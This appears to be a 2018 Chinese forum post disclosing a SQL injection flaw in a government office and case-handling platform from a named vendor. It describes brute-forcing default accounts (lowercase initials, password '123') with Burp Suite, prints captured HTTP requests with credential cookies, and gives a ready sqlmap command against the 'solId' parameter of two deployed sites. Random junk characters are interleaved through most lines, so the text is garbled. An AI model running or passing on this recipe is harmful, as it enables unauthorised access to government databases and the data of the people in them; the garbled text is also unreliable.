|
# @( y; J& i4 H; J: ?/ T) i) g L
* \" H9 G7 ^& U( C$ C8 y' a
! l) `, p* m5 I# t& V/ ]% ^. t
平台简介:. O0 L5 ? w3 r* Y. A
6 U2 x0 \* Z7 q7 u& w @( w3 f
! R$ d1 S$ B( E, W- D ) Z3 O0 z6 b- y- v5 D; \* ^
' g7 h) n% b0 V
7 N" y. U- u& R 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: W, h3 q Y" r) n+ v
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
% I$ m4 n! h8 W8 j- Y- a% G) Z
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
& ?/ h8 W4 s& @9 Y. u9 S
& T+ j5 d" L9 R4 \2 b' j; Y' r5 L: m( R; v" ?; [1 X
; j' W6 O2 Q" h5 A- j
! `% Q# F: i7 i. Y1 C, g1 ]4 ]
! c3 R0 F7 J4 T2 ] 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
0 E1 G0 X* M; S. |
7 r: ^! Z9 c# O( Q% G7 a: L0 b% s& _4 N9 [5 F
7 L/ H$ M: W" E6 P4 X7 [ 7 B" |# P& i- z
1 e9 |9 V/ [: |9 I# U+ b* D http://1.1.1.1:7197/cap-aco/#(案例2-)
: v, v4 ~0 O" h9 G6 X. j
( z: d( q2 O( c, H i* L2 ~7 Q7 w( c/ a0 c% Y7 Z$ s1 E; P
http://www.XXOO.com (案例1-官网网站)) n' ?+ f. `$ X. T+ K" V9 [ j
# v( I) K0 L+ U, ]( u8 V: \9 m+ z$ G* `% C
8 H8 z U" x0 I4 q8 w8 Z
h* M: c" b$ R7 Z
" O* V7 [) z- q% W 漏洞详情:
8 S1 E: x, _" \. B/ o7 F( r
/ `! V8 M7 o6 |2 [/ a, y0 ~: y% Y& u- N6 J
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
, T! }7 n# Z# o: M+ F7 y 1 k' ]2 P0 D$ p
; ^ I9 y8 ^* y/ C6 Z7 B 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:8 D/ U/ n- F2 |' a* Z
$ d5 t& d. {3 F: s
) j* S7 ?( _3 V; V( S
) q! }1 R/ S" P+ A, e9 D, Z 9 @: c' i7 s ]& T6 L
) n3 M8 ]0 }# _4 I, {1 P- s+ }8 W  5 \; X' q5 \. c% P3 F# r3 F! K
! t+ G5 R% i4 u0 G R
0 ^! X7 a1 J- q% t3 C status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
/ }! l4 U/ _* W5 n7 B; B) J' R
, v+ C6 y n0 O/ q0 h% T
! ?4 T6 d y/ n7 i9 Y2 E0 i 1、案例1-官方网站2 Z L5 T/ v2 B! Y5 ?9 {
0 H8 b1 J6 _# Y4 f' Q
" J# ^* _) T% t+ C
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.16 O- q7 Z. H$ k% k
% n' d6 [: f% q
' L3 K; B, x# `" x6 R' r1 { Host: www.XXOO.com: V5 j- N/ }" b2 f( x& A
" j% Y7 p9 D: `7 x" C/ z- d! ~6 _! k2 F, q
Proxy-Connection: Keep-Alive/ w8 e) J6 h$ r& O' T5 ^" P! @
) C( F) d, U: H6 f2 p8 Q
+ t. \8 z! f# v6 l( B
Accept: application/json, text/javascript, */*; q=0.01
+ H) s- a. S" @6 b! p 3 W5 R% n9 M$ y; i7 o3 g$ y
+ K6 r, I0 t. o+ B) M Accept-Language: zh-CN
, V( c+ V+ M, s
& P" M0 y& Y. I! Y
2 _; ^, i/ q1 j3 H- P/ V/ } Content-Type: application/json1 b; R' v4 D6 U/ h4 R! J
$ n; s; F0 y0 {6 i/ E3 `+ |
. L5 b/ K o; k User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
7 q1 m6 q" f+ W& s' r
; E" V+ s* |6 n A/ U" b0 j( V3 E, X2 x: a3 G0 {* L* h0 ?
X-Requested-With: XMLHttpRequest
/ E9 \. H1 b' k1 J# U" c+ Y0 l( L ; U" u* y) {, m8 K0 }
0 L! s- E. \% N! |* G/ [" W v9 d
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002& q3 I' r4 a. ^& a2 I9 d
1 y/ e2 ~& d9 z
& }5 ^& D' v$ K Accept-Encoding: gzip, deflate, sdch: X- w) k: r$ f, }- s
/ q7 c+ e! i2 A7 y6 u4 f0 F9 u
& \2 T5 P3 P- v4 a1 P Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e/ W. n0 C, ]) R( `" V; p
! G- Y) ^& Z9 ]9 M
; y2 o' t, y8 n9 Q 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:+ A) l- p% d0 }% [- b
; E$ _* [# A" h4 h) K' U# L8 W, M) s& Q& A
! M/ [6 Q3 D/ ^8 d # w, N. e/ T) L
3 U" I2 b) |- e' E
- Y- @+ o8 b4 y
$ \7 w7 C1 j8 H. p1 {* {. w+ I9 M/ g) y N \7 ~) p( X
( M# e% e9 H$ t
# q+ E, C- e5 {; b% `3 n6 g& A6 h( h6 Y* X$ d6 Y
/ J; }4 f7 D* L+ r; V3 d Z" V 6 A. }0 c- }% H6 m. O! t) ?
$ W* f6 _2 }+ j% j5 e 9 _: p8 l: p* s' J y8 p2 x
/ Q4 V- q, v- O5 `
9 X [5 o) Z" P% J; F9 ^& O* E 2、案例2-某天河云平台
. k3 g) d2 x0 a; e {" t+ O
5 n) q4 F) |8 |, O/ b8 | Z
$ Y# C) G, a! m# L9 m' E GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1" s* F5 N! a9 j- [# z3 W3 v
2 A' L9 N6 {! V$ e4 l% A9 A0 b/ H' T+ Z! u
Host: 1.1.1.:71979 z, {6 d. r. H% x
( u a2 T, Y0 |" J$ U8 {3 M! i" s( ]* D/ G9 a$ J& p$ o! Z
Accept: application/json, text/javascript, */*; q=0.01
0 y0 d" \0 M& r5 g$ ]
7 w2 w8 p1 {+ v; u* D/ e9 s7 K0 }: h, V
X-Requested-With: XMLHttpRequest7 h' _4 s% n5 }6 }& g, C4 i- k: R
* f* f& }; y6 z- Z: {& _
1 D" m# _( |, N% ? User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
3 Z1 f) g/ S0 Z* `- X8 x8 \
+ }* c( k6 F, F7 P0 S. z
4 t0 O. I- z0 N0 E0 c Content-Type: application/json! Y6 S% b6 M# p
6 B! ?! _9 ?- r8 K$ V1 Z( @7 o) w! V7 g; X/ b& w5 J* f+ \
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008& A; p" W# L- P' Z: |
4 w a, O6 u# I0 n9 Z% c& v% Q7 }3 B, V7 Q9 \* z% U6 E) E6 ?7 k
Accept-Language: zh-CN,zh;q=0.8- [9 J' t$ @2 ?6 K' h
% t, E1 s% N% J' _% I0 u- `
* i7 Z8 e6 a* ]$ A Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
" o; ]0 S" T; ]8 C2 m# c# N* z - n4 v) I. H- L: Z- `
3 l6 i( H/ Q* `+ k: u" s1 s Connection: close& r) Y5 O3 r: y- d1 e$ v
( v- Q% R( u) @
. q0 q9 E8 a; X) z! ]
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
, H" g1 O% k; N! x; ]$ h
+ a- f! X# }9 j/ ?4 I h: ~ |' I4 H1 W2 {/ C: y& v) b
 3 p' s+ P2 j* H% C4 c
^4 e& B0 r4 I. x& v% t4 j/ }
" v+ C5 \" }+ F: t! a! a5 q9 s
# s+ @8 ~; R `7 h | 
发表于 2018-10-20 20:15:17
收藏
支持
反对